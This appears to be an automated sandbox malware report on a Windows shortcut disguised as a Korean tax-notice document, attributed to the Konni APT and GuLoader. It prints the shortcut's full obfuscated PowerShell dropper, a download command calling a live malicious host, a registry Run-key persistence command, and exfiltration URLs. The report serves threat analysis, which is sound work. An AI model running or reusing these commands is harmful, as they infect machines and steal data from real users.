File name:

오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk
(English gloss of the Korean lure name: "Guide to requesting submission of error-correction reports (Enforcement Rules of the National Tax Collection Act)", disguised as an .hwp document but actually a .lnk shortcut)

Full analysis: https://app.any.run/tasks/f1f88e11-9c7f-4123-bd96-a08bd6d5da5e
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: January 14, 2025, 06:27:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
exfiltration
apt
konni
spyware
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, Unicoded, HasEnvironment, PreferEnvironmentPath, length=0, window=showminnoactive
MD5:

F162170214CED849E4E8E6FDB29A0C61

SHA1:

F99BABE6E5D219C74E8CC9703053AB02C529BF16

SHA256:

A1B67CFB080F4D1E4CBB0019A30259CB291F56C0ADA02E2CA1028F675B187727

SSDEEP:

3072:/mJaq11111111L11111C1ilB11O11V1W111811u111n1v111c1111NUTcu2cdTm4:cPccmQL0EsUfRlxEWHOg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Detected an obfuscated command line used with Guloader

      • powershell.exe (PID: 6528)
    • Changes the autorun value in the registry

      • reg.exe (PID: 5392)
    • KONNI has been detected (SURICATA)

      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6560)
      • powershell.exe (PID: 6816)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 6456)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6236)
      • cmd.exe (PID: 6424)
    • Likely accesses (executes) a file from the Public directory

      • wscript.exe (PID: 6232)
      • expand.exe (PID: 3952)
      • reg.exe (PID: 5392)
      • cmd.exe (PID: 6480)
      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 7132)
      • unzip.exe (PID: 624)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6456)
      • powershell.exe (PID: 6560)
      • expand.exe (PID: 4544)
    • Application launched itself

      • cmd.exe (PID: 6424)
      • cmd.exe (PID: 6236)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 6236)
      • cmd.exe (PID: 6480)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6424)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6236)
      • cmd.exe (PID: 6480)
    • Manipulates environment variables

      • powershell.exe (PID: 6528)
    • Removes files via Powershell

      • powershell.exe (PID: 6528)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)
    • Unpacks CAB file

      • expand.exe (PID: 3952)
      • expand.exe (PID: 4544)
    • The process executes VB scripts

      • powershell.exe (PID: 6528)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 6232)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6232)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6480)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6456)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6456)
      • powershell.exe (PID: 6560)
    • Unpacks password protected archive

      • cmd.exe (PID: 6480)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6480)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6480)
    • The process connected to a server suspected of theft

      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)
    • Executable content was dropped or overwritten

      • expand.exe (PID: 3952)
  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6528)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6528)
      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6560)
      • powershell.exe (PID: 6456)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 7072)
    • The process uses the downloaded file

      • powershell.exe (PID: 6528)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6456)
    • Manual execution by a user

      • cmd.exe (PID: 6480)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6484)
    • Disables trace logs

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6456)
    • Checks supported languages

      • unzip.exe (PID: 624)
      • expand.exe (PID: 3952)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)
    • Reads the machine GUID from the registry

      • expand.exe (PID: 3952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath
FileAttributes: (none)
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
Description: hwp File
CommandLineArguments: /c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function harmless{param($island); <#resolution pervert#>$honest = $island.substring(0,$island.length-4) + ''; <#conduct distress#>return $honest;};function crime{param($clay);<#consult invest#> remove-item <#composing legislative#> -path $clay <#indulgence insoluble#> -force;};function ellipse{param($igneous,$reducing,$often,$brown,$ship);<#demand cleave#> $roundish=New-Object System.IO.FileStream(<#standard board#>$igneous,<#inscription winding#>[System.IO.FileMode]::Open,<#narrowly social#>[System.IO.FileAccess]::Read);<#qualified turning#> $roundish.Seek(<#almost corner#>$reducing,[System.IO.SeekOrigin]::Begin);<#training steam#> $inheritance=$often*0x01;<#restraint tumult#> $feed=New-Object byte[] <#angles cautious#>$often; <#sculpture offspring#> $leader=New-Object byte[] <#domestic controversy#>$inheritance; <#milk fellow#>$roundish.Read(<#perpetual array#>$leader,0,<#shape graduated#>$inheritance); $roundish.Close();$people=0;while($people -lt $often){<#roof alarm#>$feed[$people]=$leader[$people*0x01] -bxor $brown;$people++;}<#rule conquer#> set-content $ship <#edible fate#> $feed -Encoding <#going pricking#> Byte;};function sensitive{param($sour, $diamond);<#bail milk#> expand $sour <#moment flatter#> -F:* $diamond;};function sprinkle{$obstruction = $env:public<#devotion sometimes#> + '\' +<#playing inclosure#> 'doc'+'ume'+'nt'+'s';<#eastern strike#> return $obstruction;};function wife{param($forming); <#fruitful formula#>$slide = Split-Path $forming;<#dexterity customary#> return $slide;};function stately{return Get-Location;};function conquest{<#strength prove#>return $env:Temp;};function prejudice{$chalk = stately; $chart = line -vigorous $chalk; <#restrict duty#>if($chart.length -eq 0) {$chalk = conquest; <#estimation octave#>$chart = line -vigorous $chalk;} return $chart;};function 
product{$extraction = $env:public<#fourth northern#> + '\' + 'eg'+'ypt'+'ia'+'n.c'+'ab';<#strength ending#> return $extraction;};function carrying{$rhyme = $env:public<#likeness precipitate#>+'\do'+'cume'+'nt'+'s\s'+'tart'+'.vb'+'s';<#token electric#> return $rhyme;};function line{param($vigorous); $raised = @(); $happiness = [System.IO.Directory]::GetDirectories($vigorous); $surpass = [System.IO.Directory]::GetFiles($vigorous); foreach ($file in $surpass) { $fright = New-Object System.IO.FileInfo $file; if ($fright.Extension -ieq '.ln'+'k' -and $fright.Length -eq 0x000FB845) { $raised += $fright.FullName; } }; foreach ($subDir in $happiness) { $raised += line -dir $subDir; } return $raised[0];};$pottery = prejudice;<#grateful cushion#>$refractory = wife -forming $pottery;<#preacher labor#> $convey = harmless -island $pottery;ellipse -igneous <#but weak#> $pottery -reducing <#nasal discern#> 0x00002192 -often 0x00006C00 -brown <#insoluble division#> 0x2B -ship <#golden collection#> $convey;<#accept limit#> & $convey;$manuscript=product;<#determine wicked#>ellipse -igneous <#prolific warm#> $pottery -reducing <#pour attended#> 0x00008D92 -often <#subjected provoke#> 0x00013CE1 -brown <#eagle political#> 0x72 -ship <#receptacle countries#> $manuscript;<#panel male#>crime -clay $pottery;$naturally = sprinkle;<#cluster desire#>sensitive -sour $manuscript -diamond <#wreck confirm#>$naturally;<#plastic fellow#>crime -clay $manuscript;$internal = <#reducing precedent#>carrying;<#prominent interval#>& $internal;") )
IconFileName: .hwp
No data.
All screenshots are available in the full report
Total processes
151
Monitored processes
24
Malicious processes
9
Suspicious processes
2

Behavior graph

  • start
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • cmd.exe (no specs)
  • cmd.exe (no specs)
  • findstr.exe (no specs)
  • #GULOADER powershell.exe (no specs)
  • openwith.exe (no specs)
  • expand.exe
  • wscript.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • reg.exe
  • powershell.exe
  • unzip.exe (no specs)
  • systeminfo.exe (no specs)
  • tiworker.exe (no specs)
  • timeout.exe (no specs)
  • #KONNI powershell.exe
  • #KONNI powershell.exe
  • #KONNI powershell.exe
  • #KONNI powershell.exe
  • powershell.exe
  • expand.exe (no specs)
  • timeout.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 624
CMD: unzip.exe -o -P "a0" "C:\Users\Public\Documents\di3726.zip"
Path: C:\Users\Public\Documents\unzip.exe
Parent process: cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
9
Modules
Images
c:\users\public\documents\unzip.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
PID: 3152
CMD: systeminfo
Path: C:\Windows\System32\systeminfo.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3540
CMD: timeout -t 5 /nobreak
Path: C:\Windows\System32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 3772
CMD: powershell -command "function MLGBRrjjOTu{param ($jqCTIhZAxl,$kfNUsRSHCDz);$JBIEmUsgSR = [System.Text.Encoding]::UTF8.GetBytes($jqCTIhZAxl); $ECAXqTKcgSu = [System.Text.Encoding]::UTF8.GetBytes($kfNUsRSHCDz);$VnsNRPPnlwed = New-Object byte[](256);$kxQuNhgwoH = New-Object byte[](256);for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$VnsNRPPnlwed[$nXgNVlbzwrTx] = $nXgNVlbzwrTx;$kxQuNhgwoH[$nXgNVlbzwrTx] = $ECAXqTKcgSu[$nXgNVlbzwrTx % $ECAXqTKcgSu.Length];}$UYdROjElaQ = 0;for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx] + $kxQuNhgwoH[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;}$MHAheRKHRFeM = New-Object byte[] $JBIEmUsgSR.Length;$nXgNVlbzwrTx = 0;$UYdROjElaQ = 0;for ($NwUmxAYFGscW = 0; $NwUmxAYFGscW -lt $JBIEmUsgSR.Length; $NwUmxAYFGscW++) {$nXgNVlbzwrTx = ($nXgNVlbzwrTx + 1) % 256;$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;$zBXVlJeTklt = ($VnsNRPPnlwed[$nXgNVlbzwrTx] + $VnsNRPPnlwed[$UYdROjElaQ]) % 256;$MHAheRKHRFeM[$NwUmxAYFGscW] = $JBIEmUsgSR[$NwUmxAYFGscW] -bxor $VnsNRPPnlwed[$zBXVlJeTklt];}$KzigMrYemXG = [System.Convert]::ToBase64String($MHAheRKHRFeM);return $KzigMrYemXG;};$QlHKpkaDhTHf = 'https://raleighice.com/wp-includes/js/inc/get.php?ra=iew&zw=lk0100';$liLROUyJNri = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$aVmsVMkBoEvn=(Get-Date).Ticks.ToString();$WwSdMQbZUdfJ = $QlHKpkaDhTHf.Split('?')[1];$qNNYHElwOS = MLGBRrjjOTu -jqCTIhZAxl $WwSdMQbZUdfJ -kfNUsRSHCDz $aVmsVMkBoEvn;$QlHKpkaDhTHf=$QlHKpkaDhTHf.Split('?')[0]+'?'+$aVmsVMkBoEvn+'='+[System.Web.HttpUtility]::UrlEncode($qNNYHElwOS);iwr -Uri $QlHKpkaDhTHf -OutFile $liLROUyJNri;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 3952
CMD: "C:\WINDOWS\system32\expand.exe" C:\Users\Public\egyptian.cab -F:* C:\Users\Public\documents
Path: C:\Windows\System32\expand.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
PID: 4164
CMD: timeout -t 57 /nobreak
Path: C:\Windows\System32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 4544
CMD: expand rBZlI.cab -F:* C:\Users\Public\Documents\
Path: C:\Windows\System32\expand.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
PID: 5392
CMD: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v startsvc1 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
PID: 5748
CMD: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -Embedding
Path: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe
Parent process: svchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
PID: 6232
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
40 925
Read events
40 922
Write events
3
Delete events
0

Modification events

(PID) Process: (5392) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: startsvc1
Value:
C:\Users\Public\Documents\start.vbs
(PID) Process: (5748) TiWorker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write
Name: SessionIdHigh
Value:
31155789
(PID) Process: (5748) TiWorker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write
Name: SessionIdLow
Value:
Executable files
2
Suspicious files
3
Text files
35
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 3952
Process: expand.exe
Filename: C:\Users\Public\Documents\75178709.bat
Type: text
MD5: C13C5E30A28B3D960E9F110B6B3DF546
SHA256: 22EFCCDC114D488CBCAA37A965BC401D3A6B32C3BC165C5C547BFFC49DC625AD

PID: 6528
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aq4xj2wg.0pf.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3952
Process: expand.exe
Filename: C:\Users\Public\Documents\13107442.bat
Type: text
MD5: 478457B89392536099806F74B9F60BC5
SHA256: 3646A4FB2C5378E65393B6C7B7A6977B7203FF2B3637CE53C0F7FC197C5AC1B2

PID: 6528
Process: powershell.exe
Filename: C:\Users\Public\egyptian.cab
Type: compressed
MD5: 957ADDA6FD9BDB8DB2EF6A14F224F769
SHA256: EB43B1D364DD08B6A16406FFD458C18F267541864AEA8FC30B0BD1FA3AEF40AE

PID: 3952
Process: expand.exe
Filename: C:\Users\Public\Documents\start.vbs
Type: text
MD5: 11CDEFEFA9DE934730F266E6A08E7E16
SHA256: BE5A657DAB3DF9C50B6AA15FD214E9BA9879DF7899E7F844BBBC6767E614E6AB

PID: 6528
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_igsa20mp.fsm.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3952
Process: expand.exe
Filename: C:\Users\Public\Documents\68354122.bat
Type: text
MD5: 2BF12F8FB8C2B2D8B0F0832BBF132A8C
SHA256: C3FC560BDAE5F2C0CDADC2C32E71D34EC31FDD7F033B1CC128370D34255EBA93

PID: 3952
Process: expand.exe
Filename: C:\Users\Public\Documents\98755194.bat
Type: text
MD5: F2CD33F7CE1F794881AA53AC19E6049D
SHA256: 083E10819A8884D4085A9A53B2B8C88CE3CE8BB4DC9F4C2E1CC3F423C08B01B2

PID: 6480
Process: cmd.exe
Filename: C:\Users\Public\Documents\d2.txt
Type: text
MD5: 4C56A6F762421FC16CB49149C226AF87
SHA256: 2783A58731044EC554C805EFC200E4EC6E687A52DEDBDFB439AD5BBFF5E31816

PID: 6480
Process: cmd.exe
Filename: C:\Users\Public\Documents\d3.txt
Type: text
MD5: 9B6C546F888BE4E74825ABF848766905
SHA256: F37DD18412547C87025D6BEBADB5EC308E8DFF0498D55579025F34F9908603D3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
38
DNS requests
19
Threats
5

HTTP requests

PID: -, Process: -, Method: GET, HTTP Code: 200, IP: 2.16.241.19:80, URL: http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl, CN: unknown, Reputation: whitelisted
PID: 4712, Process: MoUsoCoreWorker.exe, Method: GET, HTTP Code: 200, IP: 2.16.241.19:80, URL: http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl, CN: unknown, Reputation: whitelisted
PID: 4712, Process: MoUsoCoreWorker.exe, Method: GET, HTTP Code: 200, IP: 2.23.246.101:80, URL: http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl, CN: unknown, Reputation: whitelisted
PID: -, Process: -, Method: GET, HTTP Code: 200, IP: 2.23.246.101:80, URL: http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl, CN: unknown, Reputation: whitelisted
PID: -, Process: -, Method: GET, HTTP Code: 200, IP: 184.30.131.245:80, URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D, CN: unknown, Reputation: whitelisted
PID: 1176, Process: svchost.exe, Method: GET, HTTP Code: 200, IP: 184.30.131.245:80, URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, CN: unknown, Reputation: whitelisted
PID: 6484, Process: powershell.exe, Method: POST, HTTP Code: 200, IP: 31.11.36.13:80, URL: http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php, CN: unknown, Reputation: unknown
PID: 6360, Process: backgroundTaskHost.exe, Method: GET, HTTP Code: 200, IP: 184.30.131.245:80, URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D, CN: unknown, Reputation: whitelisted
PID: 7132, Process: powershell.exe, Method: POST, HTTP Code: 200, IP: 31.11.36.13:80, URL: http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php, CN: unknown, Reputation: unknown
PID: 6816, Process: powershell.exe, Method: POST, HTTP Code: 200, IP: 31.11.36.13:80, URL: http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php, CN: unknown, Reputation: unknown
(Type and Size columns were not captured for any row; PID/Process shown as "-" where the report did not record them.)

Connections

PID: 4, Process: System, IP: 192.168.100.255:137, Domain: -, ASN: -, CN: -, Reputation: whitelisted
PID: -, Process: -, IP: 40.127.240.158:443, Domain: settings-win.data.microsoft.com, ASN: MICROSOFT-CORP-MSN-AS-BLOCK, CN: IE, Reputation: whitelisted
PID: 4712, Process: MoUsoCoreWorker.exe, IP: 2.16.241.19:80, Domain: crl.microsoft.com, ASN: Akamai International B.V., CN: DE, Reputation: whitelisted
PID: -, Process: -, IP: 2.16.241.19:80, Domain: crl.microsoft.com, ASN: Akamai International B.V., CN: DE, Reputation: whitelisted
PID: 4712, Process: MoUsoCoreWorker.exe, IP: 2.23.246.101:80, Domain: www.microsoft.com, ASN: Ooredoo Q.S.C., CN: QA, Reputation: whitelisted
PID: -, Process: -, IP: 2.23.246.101:80, Domain: www.microsoft.com, ASN: Ooredoo Q.S.C., CN: QA, Reputation: whitelisted
PID: 5064, Process: SearchApp.exe, IP: 2.23.227.208:443, Domain: www.bing.com, ASN: Ooredoo Q.S.C., CN: QA, Reputation: whitelisted
PID: -, Process: -, IP: 184.30.131.245:80, Domain: ocsp.digicert.com, ASN: AKAMAI-AS, CN: US, Reputation: whitelisted
PID: 4, Process: System, IP: 192.168.100.255:138, Domain: -, ASN: -, CN: -, Reputation: whitelisted
PID: 1176, Process: svchost.exe, IP: 20.190.159.4:443, Domain: login.live.com, ASN: MICROSOFT-CORP-MSN-AS-BLOCK, CN: IE, Reputation: whitelisted
(Fields shown as "-" were not recorded in the report for that row.)

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.14
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 2.23.227.208
  • 2.23.227.215
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
login.live.com
  • 20.190.159.4
  • 20.190.159.0
  • 20.190.159.75
  • 20.190.159.73
  • 20.190.159.2
  • 40.126.31.71
  • 20.190.159.68
  • 40.126.31.69
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
raleighice.com
  • 162.241.219.212
unknown
www.fantasiasognorealta.com
  • 31.11.36.13
unknown

Threats

PID: 6484, Process: powershell.exe, Class: Successful Credential Theft Detected, Message: SPYWARE [ANY.RUN] Konni.APT Exfiltration
PID: 7132, Process: powershell.exe, Class: Successful Credential Theft Detected, Message: SPYWARE [ANY.RUN] Konni.APT Exfiltration
PID: 6816, Process: powershell.exe, Class: Successful Credential Theft Detected, Message: SPYWARE [ANY.RUN] Konni.APT Exfiltration
PID: 6560, Process: powershell.exe, Class: Successful Credential Theft Detected, Message: SPYWARE [ANY.RUN] Konni.APT Exfiltration
PID: 6456, Process: powershell.exe, Class: Not Suspicious Traffic, Message: ET INFO Windows Powershell User-Agent Usage
No debug info